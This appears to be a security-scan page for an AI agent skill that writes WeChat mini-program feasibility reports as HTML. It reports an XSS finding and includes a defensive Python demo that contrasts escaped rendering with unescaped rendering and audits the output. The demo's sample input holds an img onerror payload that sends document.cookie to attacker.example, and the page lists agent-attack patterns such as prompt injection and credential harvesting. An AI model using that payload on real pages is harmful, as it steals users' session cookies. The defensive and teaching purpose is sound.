微信小程序开发辅助决策助手 (WeChat Mini-Program Development Decision-Support Assistant)

Security checks across malware telemetry and agentic risk

Overview

This skill generates WeChat mini-program feasibility research reports as HTML files. Treat the generated HTML as untrusted: report content is interpolated into the document without escaping.

Install only if you are comfortable with a skill that searches public sources and writes a local HTML report to disk. Open generated reports cautiously, especially when they include competitor or other web-sourced text, because the generator does not HTML-escape content. Review the output path and, ideally, the raw source first, and do not open reports built from untrusted inputs in a browser profile that holds sensitive sessions.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (2)

Description-Behavior Mismatch

Severity: Medium
Confidence: 98%
Finding
The report generator interpolates many attacker-controlled fields (name, direction, keywords, competitor data, business model text, promotion text, and risk descriptions) directly into an HTML document without escaping. If any of these inputs contain HTML or JavaScript, opening the generated report executes that script in the viewer's browser, so web-sourced text such as a competitor description becomes a persistent XSS payload that can read the rendered report's contents and send them to an external host.

Missing User Warnings

Severity: Medium
Confidence: 91%
Finding
The skill omits a clear user warning that it writes an HTML report to disk, even though it uses Write and shows file output examples. Undisclosed filesystem writes can surprise users, overwrite files, or leave sensitive business analysis artifacts on disk where they may be exposed to other processes or users.
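The two findings above describe an unescaped HTML template and an undisclosed file write. The following Python is an added example, not code from the skill or from SkillSpector: it places the flagged pattern (fields interpolated verbatim) beside the hardened form (every field passed through html.escape), adds a pre-open audit that flags script elements, inline event handlers and remote loads in a generated report, and writes the file with O_EXCL and mode 0600 so an existing report is never silently overwritten and other local users cannot read it. The field names follow the finding; the template, the sample input and the injected competitor string are constructed for the demonstration and do not come from the page.

```python
"""Added example (not the skill's own code): unsafe vs escaped report
rendering, a pre-open audit of the generated HTML, and a non-clobbering write."""
import html
import os
import re
import tempfile

# Constructed sample input standing in for the skill's web-sourced data.
# The competitor field carries an injected payload of the kind the finding describes.
SAMPLE_FIELDS = {
    "name": "Campus Second-hand Marketplace",
    "direction": "e-commerce",
    "keywords": "second-hand, students",
    "competitor": "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
    "risks": "Regulatory <b>risk</b> is moderate",
}

# Hypothetical report template; the real skill's layout is not on the page.
TEMPLATE = """<!doctype html>
<html><head><meta charset="utf-8"><title>{name}</title></head>
<body>
<h1>{name}</h1>
<p>Direction: {direction}</p>
<p>Keywords: {keywords}</p>
<h2>Competitors</h2><p>{competitor}</p>
<h2>Risks</h2><p>{risks}</p>
</body></html>
"""


def render_unsafe(fields: dict) -> str:
    """Mirrors the flagged behaviour: field values enter the HTML verbatim."""
    return TEMPLATE.format(**fields)


def render_safe(fields: dict) -> str:
    """Hardened form: every value is HTML-escaped (including quotes) first."""
    return TEMPLATE.format(**{k: html.escape(str(v), quote=True) for k, v in fields.items()})


# Constructs a static feasibility report has no reason to contain. Each pattern
# requires a real tag so escaped text such as "&lt;img ... onerror=" is not flagged.
_SUSPICIOUS = [
    ("script_element", re.compile(r"<script\b", re.I)),
    ("inline_event_handler", re.compile(r"<[a-z]+[^>]*\son[a-z]+\s*=", re.I)),
    ("javascript_url", re.compile(r"<[a-z]+[^>]*\b(?:href|src)\s*=\s*['\"]?\s*javascript:", re.I)),
    ("embedded_frame", re.compile(r"<(?:iframe|object|embed)\b", re.I)),
    ("remote_resource", re.compile(r"<(?:img|link|script)\b[^>]*\bsrc\s*=\s*['\"]?https?://", re.I)),
]


def audit_report(doc: str) -> list:
    """Names of suspicious constructs in the HTML; an empty list means nothing active was found."""
    return [name for name, pattern in _SUSPICIOUS if pattern.search(doc)]


def write_report(directory: str, doc: str, filename: str = "report.html") -> str:
    """Write with O_EXCL so an existing file is never overwritten, and 0o600 so
    the analysis is not readable by other local users. Returns the path."""
    path = os.path.join(directory, filename)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w", encoding="utf-8") as f:
        f.write(doc)
    return path


def demo() -> dict:
    """Render both variants, audit them, and show the write refusing to clobber."""
    unsafe = render_unsafe(SAMPLE_FIELDS)
    safe = render_safe(SAMPLE_FIELDS)
    workdir = tempfile.mkdtemp(prefix="wxreport-")
    path = write_report(workdir, safe)
    try:
        write_report(workdir, safe)  # second write to the same name must fail
        clobber_blocked = False
    except FileExistsError:
        clobber_blocked = True
    return {
        "unsafe_findings": audit_report(unsafe),
        "safe_findings": audit_report(safe),
        "payload_escaped": "&lt;img" in safe and "<img" not in safe,
        "clobber_blocked": clobber_blocked,
        "path": path,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the audit over a report before opening it is the practical check the overview asks for: the unescaped variant trips the inline event handler rule, the escaped one passes, and the injected tag survives only as literal text on the page.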

VirusTotal

65/65 vendors flagged this skill as clean.
